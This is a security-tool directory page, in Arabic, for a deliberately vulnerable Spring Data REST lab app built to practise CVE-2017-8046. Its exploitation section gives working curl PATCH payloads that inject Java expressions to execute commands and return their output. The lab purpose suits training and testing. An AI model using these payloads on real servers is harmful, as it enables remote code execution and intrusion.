Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SpringBreakVulnerableApp — تحذير: هذا تطبيق ضعيف لاختبار استغلال ثغرة Spring Break (CVE-2017-8046). قم بتشغيله على مسؤوليتك الخاصة! | Kitploit
أدوات/GitHubGitHub/m3ssap0/springbreakvulnerableapp
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubm3ssap0/springbreakvulnerableapp

SpringBreakVulnerableApp

تحذير: هذا تطبيق ضعيف لاختبار استغلال ثغرة Spring Break (CVE-2017-8046). قم بتشغيله على مسؤوليتك الخاصة!

عرض المستودع
1410منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تطبيق Spring Break الهش

هذا تطبيق هش لاختبار استغلال ثغرة Spring Break (CVE-2017-8046).

تحذير!

يحتوي هذا التطبيق على ثغرات أمنية خطيرة. قم بتشغيله على مسؤوليتك الخاصة! يُنصح باستخدام بيئة معزولة ومدعومة بنسخة احتياطية (مثل جهاز افتراضي مع لقطة حديثة وشبكة مخصصة للمضيف فقط). لا ترفع هذا التطبيق إلى أي خوادم مواجهة للإنترنت، لأنها ستُخترق.

إخلاء مسؤولية: لا أتحمل أي مسؤولية عن الطريقة التي يستخدم بها أي شخص هذا التطبيق (SpringBreakVulnerableApp). الغرض الوحيد من هذا التطبيق هو أن يكون سيناريو اختبار لاستغلال ثغرة Spring Break ويجب ألا يُستخدم بشكل ضار. إذا تم اختراق خادمك عبر تثبيت SpringBreakVulnerableApp، فإن ذلك ليس مسؤوليتي، بل مسؤولية الشخص (أو الأشخاص) الذين رفعوه وثبّتوه.

معلومات الثغرة

  • CVE-ID: CVE-2017-8046
  • الرابط: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  • الوصف: يمكن لطلبات PATCH الخبيثة المُرسلة إلى خوادم spring-data-rest في إصدارات Pivotal Spring Data REST السابقة لـ 2.5.12 و2.6.7 و3.0 RC3، وإصدارات Spring Boot السابقة لـ 2.0.0M4، وسلاسل إصدارات Spring Data السابقة لـ Kay-RC3 استخدام بيانات JSON مُصممة خصيصًا لتنفيذ كود Java عشوائي.

الاستخدام

يمكن تشغيل التطبيق باستخدام أمر Maven التالي.

root@kitploit:~
mvn spring-boot:run

يمكن إنشاء ملف jar كامل (fat jar) باستخدام أمر Maven التالي.

root@kitploit:~
mvn clean install spring-boot:repackage

لإدراج البيانات يمكنك استخدام أمر curl التالي.

root@kitploit:~
curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://hostname:port/entity

الاستغلال

ربما يكون أبسط استغلال هو الطلب التالي.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Thread).sleep(10000).x", "value" : "pwned" }]' "http://hostname:port/entity/1"

على نظام Windows، يمكن تشغيل عملية calc.exe باستخدام الطلب التالي. يمكن استخدام طلبات مماثلة لتنفيذ أوامر عشوائية.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Runtime).getRuntime().exec(\"calc.exe\").x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

للحصول على مخرجات الأوامر المُنفذة، يمكن استخدام بعض "gadgets" التي يوفرها كود Spring Framework. لحسن الحظ، لا تتطلب أي تبعيات خارجية. على سبيل المثال، يمكن استرداد نتيجة أمر ipconfig باستخدام الطلب التالي.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ipconfig\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

على نظام Windows، يمكن تشغيل أمر cmd /c dir وغيره من الأوامر المشابهة باستخدام الطلب التالي. يرجى ملاحظة الحيلة المستخدمة لإدراج حرف الشرطة المائلة مع تجنب القيمة الصريحة (أي يتم استبدال الشرطات المائلة الصريحة بنقاط قبل التحليل الفعلي).

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

يمكن العثور على برنامج Java لاستغلال هذه الثغرة هنا.

المؤلفون

  • Antonio Francesco Sardella - التنفيذ - m3ssap0

الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE.txt للتفاصيل.

الشكر والتقدير

  • Man Yue Mo الباحث الأمني الذي اكتشف الثغرة
تنزيل الأداة